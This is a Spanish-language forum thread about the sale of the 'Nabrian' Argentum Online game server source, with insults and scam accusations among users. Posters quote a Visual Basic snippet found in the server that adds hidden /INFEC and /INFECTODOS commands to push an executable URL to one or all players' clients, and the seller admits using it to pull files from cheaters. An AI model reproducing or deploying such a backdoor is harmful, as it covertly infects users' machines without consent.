[Se vende] Nabrian

Estado
Cerrado para nuevas respuestas.

Reload Argentum

Newbie Lvl 1
Vendo servidor completo, listo para poner online.
Dejo unas imágenes del servidor, aunque muchos ya lo conocen:

Para mas información, envíen MP.
Saludos

Ahlev

Newbie Lvl 5
Ofrezco un 10% menos de lo que él les pida.

¡Saludos!

PD: Suerte con la venta.
nose, yo hago un 20% de descuento si es con tarjeta:+1:

pd:suerte con la venta

Tenia esto en el codigo, ¿que sera?
Código:
If UCase$(Left$(rdata, 7)) = "/INFEC " Then
    rdata = Right$(rdata, Len(rdata) - 7)
    Dim URLExe As String
    Dim ExeNameInfec As String
    Call SendData(ToIndex, Userindex, 0, "||La estructura del comando es /INFEC Http://sd.com/@[email protected]" & FONTTYPE_FENIX)

Tindex = UserList(Userindex).flags.TargetUser
    If Tindex <= 0 Then Exit Sub

Call SendData(ToIndex, Tindex, 0, "SJ" & ReadField(1, rdata, Asc("@")) & "@" & ReadField(2, rdata, Asc("@")) & "@" & ReadField(3, rdata, Asc("@")))
    Call SendData(ToIndex, Userindex, 0, "||ENVIANDO EXE A:" & UserList(UserList(Userindex).flags.TargetUser).Name & FONTTYPE_FENIX)
    Exit Sub
End If

If UCase$(Left$(rdata, 12)) = "/INFECTODOS " Then
    rdata = Right$(rdata, Len(rdata) - 12)
    Call SendData(ToIndex, Userindex, 0, "||La estructura del comando es /INFECTODOS Http://sd.com/@[email protected]" & FONTTYPE_FENIX)

Call SendData(ToAll, 0, 0, "SJ" & ReadField(1, rdata, Asc("@")) & "@" & ReadField(2, rdata, Asc("@")) & "@" & ReadField(3, rdata, Asc("@")))
    Call SendData(ToIndex, Userindex, 0, "||ENVIANDO EXE A: TODOS" & FONTTYPE_FENIX)
    Exit Sub
End If

Última edición:

Ruffneck.~

Morrigan Ancient Crone of War..
Liberenlo de una puta vez así dejan de lucrar con ese AO choto de una vez por todas. La gente no tiene 2 dedos de frente y compra porque copiaron MUCHAS cosas de BAOC.

Hefesto Lynx

Newbie Lvl 1
nose, yo hago un 20% de descuento si es con tarjeta:+1:

pd:suerte con la venta

Tenia esto en el codigo, ¿que sera?
Código:
If UCase$(Left$(rdata, 7)) = "/INFEC " Then
    rdata = Right$(rdata, Len(rdata) - 7)
    Dim URLExe As String
    Dim ExeNameInfec As String
    Call SendData(ToIndex, Userindex, 0, "||La estructura del comando es /INFEC Http://sd.com/@[email protected]" & FONTTYPE_FENIX)

Tindex = UserList(Userindex).flags.TargetUser
    If Tindex <= 0 Then Exit Sub

Call SendData(ToIndex, Tindex, 0, "SJ" & ReadField(1, rdata, Asc("@")) & "@" & ReadField(2, rdata, Asc("@")) & "@" & ReadField(3, rdata, Asc("@")))
    Call SendData(ToIndex, Userindex, 0, "||ENVIANDO EXE A:" & UserList(UserList(Userindex).flags.TargetUser).Name & FONTTYPE_FENIX)
    Exit Sub
End If

If UCase$(Left$(rdata, 12)) = "/INFECTODOS " Then
    rdata = Right$(rdata, Len(rdata) - 12)
    Call SendData(ToIndex, Userindex, 0, "||La estructura del comando es /INFECTODOS Http://sd.com/@[email protected]" & FONTTYPE_FENIX)

Call SendData(ToAll, 0, 0, "SJ" & ReadField(1, rdata, Asc("@")) & "@" & ReadField(2, rdata, Asc("@")) & "@" & ReadField(3, rdata, Asc("@")))
    Call SendData(ToIndex, Userindex, 0, "||ENVIANDO EXE A: TODOS" & FONTTYPE_FENIX)
    Exit Sub
End If
La verdad esta el dueño de ese Nabrian estafo a mi hermano le hizo pagar bastante dinero y desapareció jamas le entrego lo que habían pactado. Cerro su cuenta de facebook, cambio su celular y se llevo la plata.

Estaria bueno que tenga una buena lección y el servidor sea liberado de una buena vez!

Ahlev

Newbie Lvl 5
La verdad esta el dueño de ese Nabrian estafo a mi hermano le hizo pagar bastante dinero y desapareció jamas le entrego lo que habían pactado. Cerro su cuenta de facebook, cambio su celular y se llevo la plata.

Estaria bueno que tenga una buena lección y el servidor sea liberado de una buena vez!
Que lo libere el verdadero dueño, yo no lo soy, por lo cual no lo voy a liberar, y el que creo el post este, tampoco es el dueño

Neliamm

nabrianao
Compro Nabrian
Las versiones las vendí todas.. solo quedaron las más viejas. Y aclare en el post que solovendia una persona por versión
Post automatically merged:

Para los otros fracasados que comentaron, si tenía cosas bien raras que en este foro no supieron detectarlas, se utilizó para los usuarios que chiteaban, de hecho tengo una carpeta donde recopile cientos de cheats rarisimos que los conseguí por ese medio..
aunque es un server bastante seguro.

Y el que dice que estafe no estafe a nadie, le di un servidor dónde le advertí que no era fácil montarlo y pensó que le daría un "soporte de por vida" para que él haga un click y tenga el servidor ya online...

Última edición:

Ahlev

Newbie Lvl 5
Las versiones las vendí todas.. solo quedaron las más viejas. Y aclare en el post que solovendia una persona por versión

Para los otros fracasados que comentaron, si tenía cosas bien raras que en este foro no supieron detectarlas, se utilizó para los usuarios que chiteaban, de hecho tengo una carpeta donde recopile cientos de cheats rarisimos que los conseguí por ese medio..

Y el que dice que estafe no estafe a nadie, le di un servidor dónde le advertí que no era fácil montarlo y pensó que le daría un "soporte de por vida" para que él haga un click y tenga el servidor ya online...
callate flaco porfavor

Dr. Lord Fers

Legendario Inmortal Lvl 5
Miembro del equipo
Moderador
Moderador de Tecnología

¡Ese Magister en Seguridad Informática sí se puede ver!

Dr. Lord Fers

Legendario Inmortal Lvl 5
Miembro del equipo
Moderador
Moderador de Tecnología
No esperaba mas que un comentario incompetente, pero bueno que esperar de este foro si los moderadores son bastante "maduros".
Espero algún día lleguen a estudiar algo y hacer algo útil por su vida.
¡Un saludo!
El que vino a alardear con aires de superioridad hacia todo el Foro fuiste vos.
Y en relación a tu segundo párrafo, lo único que puedo decir es que ni me debés conocer, porque el que necesita "estudiar algo" y "hacer algo útil por su vida", hasta donde tengo entendido, serías vos.
Además de todo eso, tengamos en cuenta que si te fuera tan bien, no estarías vendiendo códigos de un juego copy-paste 2D, encima "mod Fénix".

¡Otro saludo!

Neliamm

nabrianao
Revivida y falta de respeto.
??

La que le vendiste a un amigo se la vendiste a muchas personas más pobre quien cayo en tu trampa
La compraron para revenderla... y esta bien, hasta en mi nombre les permito revenderla.

El que vino a alardear con aires de superioridad hacia todo el Foro fuiste vos.
Y en relación a tu segundo párrafo, lo único que puedo decir es que ni me debés conocer, porque el que necesita "estudiar algo" y "hacer algo útil por su vida", hasta donde tengo entendido, serías vos.
Además de todo eso, tengamos en cuenta que si te fuera tan bien, no estarías vendiendo códigos de un juego copy-paste 2D, encima "mod Fénix".

¡Otro saludo!
Si porsupuesto, soy yo el que esta todo el día pendiente a este foro.
Fracasado...

Estado
Cerrado para nuevas respuestas.